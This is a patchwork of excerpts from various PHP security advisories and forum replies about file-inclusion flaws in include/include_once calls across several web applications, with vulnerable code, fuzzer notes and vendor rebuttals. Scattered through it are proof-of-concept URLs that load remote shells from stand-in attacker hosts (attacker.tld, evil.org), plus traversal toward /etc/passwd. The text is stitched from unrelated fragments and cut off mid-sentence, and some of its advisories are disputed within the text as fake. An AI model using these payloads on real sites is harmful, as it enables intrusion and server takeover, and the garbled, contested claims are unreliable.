include once
$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");
if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"]))) $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];
--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
header ('Content-Type: text/html; charset=utf-8');
// Data Includes
include_once "PHPLib/db_mysql.inc";
include_once "Data/dbConnection.class.php";
include_once "Data/dbConfig.class.php";
include_once "Data/dataAdapter.class.php";
include_once "Quicksite/Core/domxml.class.php";
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------------
bugs:
xoops-2.0.16-Kararli/htdocs/notifications.php include_once $lookup_file;
xoops-2.0.16-Kararli/htdocs/extras/login.php include $path.'/mainfile.php';
xoops-2.0.16-Kararli/htdocs/include/functions.php require_once $hnd_file;
xoops-2.0.16-Kararli/htdocs/include/functions.php include_once $hnd_file;
xoops-2.0.16-Kararli/htdocs/kernel/notification.php include_once $tags_file;
xoops-2.0.16-Kararli/htdocs/kernel/notification.php include_once $lookup_file;
[!] index.php
// load global definitions
if($home = getenv('YACS_HOME'))
include_once str_replace('//', '/', $home.'/').'shared/global.php'; // <= 0
elseif(is_readable('yacs.home') && is_callable('file_get_contents') && ($content = trim(file_get_contents('yacs.home'), " \t\n\r\0\x0B\\/.")) && is_readable($content.'/shared/global.php'))
include_once $content.'/shared/global.php'; // <= 1
elseif(is_readable('shared/global.php'))
include_once 'shared/global.php';
elseif(is_readable('yacs/shared/global.php'))
// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
// user customized language file (already read by common.php)
// include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
// default language file
include_once "$mytrustdirpath/language/$language/main.php" ;
...
Below you can find the sources of two simple "academic" fuzzers, later
results are discussed and finally POCs and conclusions are proposed.
II) PHP arbitrary Local File Inclusion testing
This tests include(), include_once(), require(), require_once() and
similiar functions.
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
alfi_fuzzer.php:
2. $nextitem comes from a database row.
3. $specialtemplates isn't even used.
Rather than just searching for require_once / include_once in the code maybe actually read the context or even do some testing?
Scott MacVicar
Development Team, vBulletin
C) Local File Inclusion
In settings.php an user can set the favorite theme to use.
This theme is included using the include_once PHP function.
The original path is themes/ but using the directory
traversal sequence, an user can include arbitrary files.
There is a limit of characters to use, infact the theme
field into the database has a length limit equal to 25.
.
if ( file_exists("./language/".$language."/install.php") ) {
include_once "./language/".$language."/install.php";
************************************************
files on a Rapidleech server, especially files containing sensitive
information, for e.g. "/etc/passwd".
The second flaw is a Local File Inclusion vulnerability, which occurs
because programmers did not perform check on the input parameter of the
include_once() function. This input is also sent from users via "uploaded"
parameter and is a relative path to a script file which uploads file to a
particular file sharing websites, for instance, yousendit.index.php,
4shared.index.php. Therefore, hackers can read the content of an arbitrary
file by making the path in the input point to that file. If that file
contains malicious code, hackers can take control of the Rapidleech's
Register Globals: ON
Vuln code:
<?php
/* Name: Syntax Highlight */
include_once ("$libpath/geshi/geshi.php");
Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?
*****************************************************/
define('IN_SCRIPT', 'true');
you should read the code, unless to do a basic search with your editor for :
-include($
-include_once($
-require($
-require_once($
plz guys stop diffusing this kind of false advisory.
From vendor:
In future merge to PHP6, because magic_quotes will be removed from PHP 6 completely. See http://www.php.net/~derick/meeting-notes.html#magic-quotes.
Example:
By reading readme.txt create example.php:
<?php include_once "./admin/functions.php";
$config = Config();
#Here we have the dynamic news template change
$tid = $_GET['template'];
include "./news.php";
?>
++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Code
+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );
+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]
+ Script Download
you should read the code, unless to do a basic search with your editor for :
-include($
-include_once($
-require($
-require_once($
dont you think you should try your "PoC" before you do send it on a professional bugtraq like securityfocus ?
plz guys stop diffusing this kind of false advisory.
This is because of the many (evil) normalization instructions and
routines implemented in PHP in conjunction with a feature: include_path.
include_path is a feature of PHP similar to the PATH on unix systems,
when an include, include_once, require or require_once call is made if
the file is relative (eg: doesn't begin with a slash or a drive letter
on Windows) a lookup will happen in every path defined in include_path.
include_path is defined both at ./configure time and in the php.ini or
at runtime with ini_set("include_path" ..) and defaults to ".:".
I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/
Here is a snip of the code:
[snip]
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
exit(1);
}
It's a Fake:
There's the line:
[Line 827] include_once($fichero);
It isn't posible to change the value of this variable with a GET parameter:
$as_language = $_POST['as_language'];
$extract = $_POST['extract'];
$docgrp = $_POST['docgrp'];
$highlightResult = $_POST['highlightResult'];
include_once MODX_BASE_PATH .
'assets/snippets/AjaxSearch/includes/AjaxSearch.inc.php';
include MODX_BASE_PATH .
'assets/snippets/AjaxSearch/includes/templates.inc.php';
#include default language file
#Contact: 0in.email@gmail.com
#Download:http://pmm-cms.sourceforge.net/
#Greetings to:All Dark-Coders team #members:Die-angel,Slim,Umbro
#and other friends #Joker186,Artysta,Kaja,Wojto111,Rade0n
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";
Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt?
Orginal first post & exploit: http://milw0rm.com/exploits/4465
eFront-learning is vulnerable to local file inclusion vulnerability.
The file 'language.php' located in
'/www/editor/tiny_mce/langs/language.php' has the following code:
/-----
include_once $path."language/lang-".$_GET['langname'].".php.inc";
- -----/
Thus any arbitrary file can be included, using the following attack
vector:
/-----
|
